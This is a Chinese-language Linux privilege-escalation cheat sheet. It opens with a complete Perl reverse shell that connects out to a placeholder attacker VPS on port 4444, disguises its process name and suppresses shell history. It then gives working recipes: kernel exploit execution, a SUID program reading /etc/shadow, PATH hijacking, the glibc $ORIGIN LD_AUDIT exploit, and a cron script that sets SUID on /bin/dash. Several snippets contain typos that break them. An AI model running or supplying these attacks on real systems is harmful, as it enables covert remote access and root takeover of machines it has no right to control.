Linux内核漏洞提权

perl-reverse-shell.pl

#!/usr/bin/perl -w

use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell.  Change these.
my $ip = 'vpsIP地址';
my $port = 4444;

# Options
my $daemon = 1;
my $auth   = 0; # 0 means authentication is disabled and any 
        # source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
    cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

    if ($auth) {
        unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
            cgiprint("ERROR: Your client isn't authorised to view this page");
            cgiexit();
        }
    }
} elsif ($auth) {
    cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address.  Denying access");
    cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
    my $pid = fork();
    if ($pid) {
        cgiexit(0); # parent exits
    }

    setsid();
    chdir('/');
    umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
    cgiprint("Sent reverse shell to $ip:$port");
    cgiprintpage();
} else {
    cgiprint("Couldn't open reverse shell to $ip:$port: $!");
    cgiexit();    
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
    my $line = shift;
    $line .= "<p>\n";
    $global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
    cgiprintpage();
    exit 0; # 0 to ensure we don't give a 500 response.
}

# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
    print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}

# 查看内核
uname -a
# 查看发行版
cat /etc/issue
cat /etc/*release

查找提权exp

执行：
gcc exp.c -o exp
chmod +x exp
./exp
切换：
python -c 'import pty; pty.spawn("/bin/bash")'
whoami

SUID提权

suid.c

#include<stdib.h>
#include<unistd.h>

int main(){
    setuid(0);
    system("id");
    system("cat /etc/shadow");
}

# 编译
gcc suid.c -o suid-exp

# 设置suid
chmod 4775 suid-exp

查看拥有suid的命令：find / -perm -u=s -type f 2>/dev/null

劫持环境变量

echo "/bin/bash" > /tmp/cat && chmod 777 cat

# 查看环境变量
echo $PATH
# 写入环境变量
export PATH=.:$PATH

GNU C Library 动态链接区 $ORIGIN 溢出提权

[user@localhost html]$ mkdir /tmp/exploit
[user@localhost html]$ ln /bin/ping /tmp/exploit/target
[user@localhost html]$ exec 3< /tmp/exploit/target
[user@localhost html]$ ls -l /proc/$$/fd/3
[user@localhost html]$ rm -rf /tmp/exploit/
[user@localhost html]$ ls -l /proc/$$/fd/3
[user@localhost html]$ vim payload.c
[user@localhost html]$ gcc -w fPIC -shared -o /tmp/exploit payload.c
[user@localhost html]$ ls -l /tmp/exploit
[user@localhost html]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[user@localhost html]$ whomi
[user@localhost html]$ uname -a
[user@localhost html]$ cat /etc/redhat-release

payload.c

void__attribute_((constructor)) init(){
    setuid(0);
    system("/bin/bash");
}

Cron Jobs计划任务

# /etc/crontab文件
只有root用户才能编辑，其他用户可以查看

脚本文件

#!/usr/bin/env python
import os
import sys

try:
    os.system("chmod u+s /bin/dash")
except:
    sys.exit()

写入定时任务

# 直接编辑定时表
crontab -e

# 每分钟执行
*/1 * * * * /tmp/shell.py

# 每小时执行
0 * * * * /tmp/shell.py

# 每天早八点执行
0 8 * * * /tmp/shell.py

# 每周一到周五下午4点执行
0 16 * * 1-5 /tmp/shell.py